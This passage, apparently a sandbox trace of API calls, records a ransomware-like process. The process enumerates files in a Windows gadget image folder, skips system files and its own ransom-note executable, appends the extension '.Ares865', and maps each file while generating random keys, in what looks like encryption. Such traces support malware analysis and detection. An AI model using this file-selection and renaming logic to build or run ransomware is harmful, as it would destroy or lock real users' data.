phProv=0x2ccce54*=0x2f0160) returned 1 [0115.615] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.615] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.616] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1860, lpName=0x0) returned 0x170 [0115.617] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1860) returned 0x190000 [0115.618] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.619] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.619] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.619] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.619] CloseHandle (hObject=0x170) returned 1 [0115.620] CloseHandle (hObject=0x118) returned 1 [0115.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.620] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc033411, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc033411, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6bfcbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="12.png", cAlternateFileName="")) returned 1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="aoldtz.exe") returned -1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2=".") returned 1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="..") returned 1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="windows") returned -1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="bootmgr") returned -1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="temp") returned -1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="pagefile.sys") returned -1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="boot") returned -1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="ids.txt") returned -1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="ntuser.dat") returned -1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="perflogs") returned -1 [0115.620] lstrcmpiW (lpString1="12.png", lpString2="MSBuild") returned -1 [0115.620] lstrlenW (lpString="12.png") returned 6 [0115.620] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png") returned 75 [0115.620] lstrcpyW (in: lpString1=0x2cce48a, lpString2="12.png" | out: lpString1="12.png") returned="12.png" [0115.620] lstrlenW (lpString="12.png") returned 6 [0115.620] lstrlenW (lpString="Ares865") returned 7 [0115.620] lstrlenW (lpString=".dll") returned 4 [0115.620] lstrcmpiW (lpString1="12.png", lpString2=".dll") returned 1 [0115.620] lstrlenW (lpString=".lnk") returned 4 [0115.620] lstrcmpiW (lpString1="12.png", lpString2=".lnk") returned 1 [0115.621] lstrlenW (lpString=".ini") returned 4 [0115.621] lstrcmpiW (lpString1="12.png", lpString2=".ini") returned 1 [0115.621] lstrlenW (lpString=".sys") returned 4 [0115.621] lstrcmpiW (lpString1="12.png", lpString2=".sys") returned 1 [0115.621] lstrlenW (lpString="12.png") returned 6 [0115.621] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png.Ares865") returned 83 [0115.621] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\12.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\12.png.ares865"), dwFlags=0x1) returned 1 [0115.622] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\12.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.622] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5457) returned 1 [0115.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.623] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.623] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.623] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.624] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1860, lpName=0x0) returned 0x170 [0115.625] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1860) returned 0x190000 [0115.626] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.627] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.627] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.628] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.628] CloseHandle (hObject=0x170) returned 1 [0115.628] CloseHandle (hObject=0x118) returned 1 [0115.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.628] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51d64020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51d64020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="120DPI", cAlternateFileName="")) returned 1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="aoldtz.exe") returned -1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2=".") returned 1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="..") returned 1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="windows") returned -1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="bootmgr") returned -1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="temp") returned -1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="pagefile.sys") returned -1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="boot") returned -1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="ids.txt") returned -1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="ntuser.dat") returned -1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="perflogs") returned -1 [0115.628] lstrcmpiW (lpString1="120DPI", lpString2="MSBuild") returned -1 [0115.629] lstrlenW (lpString="120DPI") returned 6 [0115.629] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png") returned 75 [0115.629] lstrcpyW (in: lpString1=0x2cce48a, lpString2="120DPI" | out: lpString1="120DPI") returned="120DPI" [0115.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0115.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31afc8 [0115.629] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0115.629] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc033411, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc033411, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6bfcbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="13.png", cAlternateFileName="")) returned 1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="aoldtz.exe") returned -1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2=".") returned 1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="..") returned 1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="windows") returned -1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="bootmgr") returned -1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="temp") returned -1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="pagefile.sys") returned -1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="boot") returned -1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="ids.txt") returned -1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="ntuser.dat") returned -1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="perflogs") returned -1 [0115.629] lstrcmpiW (lpString1="13.png", lpString2="MSBuild") returned -1 [0115.629] lstrlenW (lpString="13.png") returned 6 [0115.629] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI") returned 75 [0115.629] lstrcpyW (in: lpString1=0x2cce48a, lpString2="13.png" | out: lpString1="13.png") returned="13.png" [0115.629] lstrlenW (lpString="13.png") returned 6 [0115.629] lstrlenW (lpString="Ares865") returned 7 [0115.629] lstrlenW (lpString=".dll") returned 4 [0115.629] lstrcmpiW (lpString1="13.png", lpString2=".dll") returned 1 [0115.629] lstrlenW (lpString=".lnk") returned 4 [0115.629] lstrcmpiW (lpString1="13.png", lpString2=".lnk") returned 1 [0115.629] lstrlenW (lpString=".ini") returned 4 [0115.629] lstrcmpiW (lpString1="13.png", lpString2=".ini") returned 1 [0115.629] lstrlenW (lpString=".sys") returned 4 [0115.629] lstrcmpiW (lpString1="13.png", lpString2=".sys") returned 1 [0115.629] lstrlenW (lpString="13.png") returned 6 [0115.630] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png.Ares865") returned 83 [0115.630] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\13.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\13.png.ares865"), dwFlags=0x1) returned 1 [0115.632] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\13.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.632] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4066) returned 1 [0115.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.632] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.633] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.633] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.633] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12f0, lpName=0x0) returned 0x170 [0115.634] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12f0) returned 0x190000 [0115.635] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.636] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.636] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.637] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.637] CloseHandle (hObject=0x170) returned 1 [0115.637] CloseHandle (hObject=0x118) returned 1 [0115.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.637] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc07f6cf, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc07f6cf, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6e5e1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="14.png", cAlternateFileName="")) returned 1 [0115.637] lstrcmpiW (lpString1="14.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.637] lstrcmpiW (lpString1="14.png", lpString2="aoldtz.exe") returned -1 [0115.637] lstrcmpiW (lpString1="14.png", lpString2=".") returned 1 [0115.637] lstrcmpiW (lpString1="14.png", lpString2="..") returned 1 [0115.637] lstrcmpiW (lpString1="14.png", lpString2="windows") returned -1 [0115.637] lstrcmpiW (lpString1="14.png", lpString2="bootmgr") returned -1 [0115.638] lstrcmpiW (lpString1="14.png", lpString2="temp") returned -1 [0115.638] lstrcmpiW (lpString1="14.png", lpString2="pagefile.sys") returned -1 [0115.638] lstrcmpiW (lpString1="14.png", lpString2="boot") returned -1 [0115.638] lstrcmpiW (lpString1="14.png", lpString2="ids.txt") returned -1 [0115.638] lstrcmpiW (lpString1="14.png", lpString2="ntuser.dat") returned -1 [0115.638] lstrcmpiW (lpString1="14.png", lpString2="perflogs") returned -1 [0115.638] lstrcmpiW (lpString1="14.png", lpString2="MSBuild") returned -1 [0115.638] lstrlenW (lpString="14.png") returned 6 [0115.638] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png") returned 75 [0115.638] lstrcpyW (in: lpString1=0x2cce48a, lpString2="14.png" | out: lpString1="14.png") returned="14.png" [0115.638] lstrlenW (lpString="14.png") returned 6 [0115.638] lstrlenW (lpString="Ares865") returned 7 [0115.638] lstrlenW (lpString=".dll") returned 4 [0115.638] lstrcmpiW (lpString1="14.png", lpString2=".dll") returned 1 [0115.638] lstrlenW (lpString=".lnk") returned 4 [0115.638] lstrcmpiW (lpString1="14.png", lpString2=".lnk") returned 1 [0115.638] lstrlenW (lpString=".ini") returned 4 [0115.638] lstrcmpiW (lpString1="14.png", lpString2=".ini") returned 1 [0115.638] lstrlenW (lpString=".sys") returned 4 [0115.638] lstrcmpiW (lpString1="14.png", lpString2=".sys") returned 1 [0115.638] lstrlenW (lpString="14.png") returned 6 [0115.638] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png.Ares865") returned 83 [0115.638] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\14.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\14.png.ares865"), dwFlags=0x1) returned 1 [0115.640] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\14.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.641] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4066) returned 1 [0115.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.641] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.642] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.642] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.642] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12f0, lpName=0x0) returned 0x170 [0115.644] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12f0) returned 0x190000 [0115.650] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.651] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.651] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.652] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.652] CloseHandle (hObject=0x170) returned 1 [0115.652] CloseHandle (hObject=0x118) returned 1 [0115.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.652] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51d3dec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51d3dec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="144DPI", cAlternateFileName="")) returned 1 [0115.652] lstrcmpiW (lpString1="144DPI", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.652] lstrcmpiW (lpString1="144DPI", lpString2="aoldtz.exe") returned -1 [0115.652] lstrcmpiW (lpString1="144DPI", lpString2=".") returned 1 [0115.652] lstrcmpiW (lpString1="144DPI", lpString2="..") returned 1 [0115.652] lstrcmpiW (lpString1="144DPI", lpString2="windows") returned -1 [0115.652] lstrcmpiW (lpString1="144DPI", lpString2="bootmgr") returned -1 [0115.652] lstrcmpiW (lpString1="144DPI", lpString2="temp") returned -1 [0115.652] lstrcmpiW (lpString1="144DPI", lpString2="pagefile.sys") returned -1 [0115.652] lstrcmpiW (lpString1="144DPI", lpString2="boot") returned -1 [0115.652] lstrcmpiW (lpString1="144DPI", lpString2="ids.txt") returned -1 [0115.652] lstrcmpiW (lpString1="144DPI", lpString2="ntuser.dat") returned -1 [0115.653] lstrcmpiW (lpString1="144DPI", lpString2="perflogs") returned -1 [0115.653] lstrcmpiW (lpString1="144DPI", lpString2="MSBuild") returned -1 [0115.653] lstrlenW (lpString="144DPI") returned 6 [0115.653] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png") returned 75 [0115.653] lstrcpyW (in: lpString1=0x2cce48a, lpString2="144DPI" | out: lpString1="144DPI") returned="144DPI" [0115.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0115.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31b068 [0115.653] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cd0 | out: ListHead=0x2e7710, ListEntry=0x2e7cd0) returned 0x2e7a90 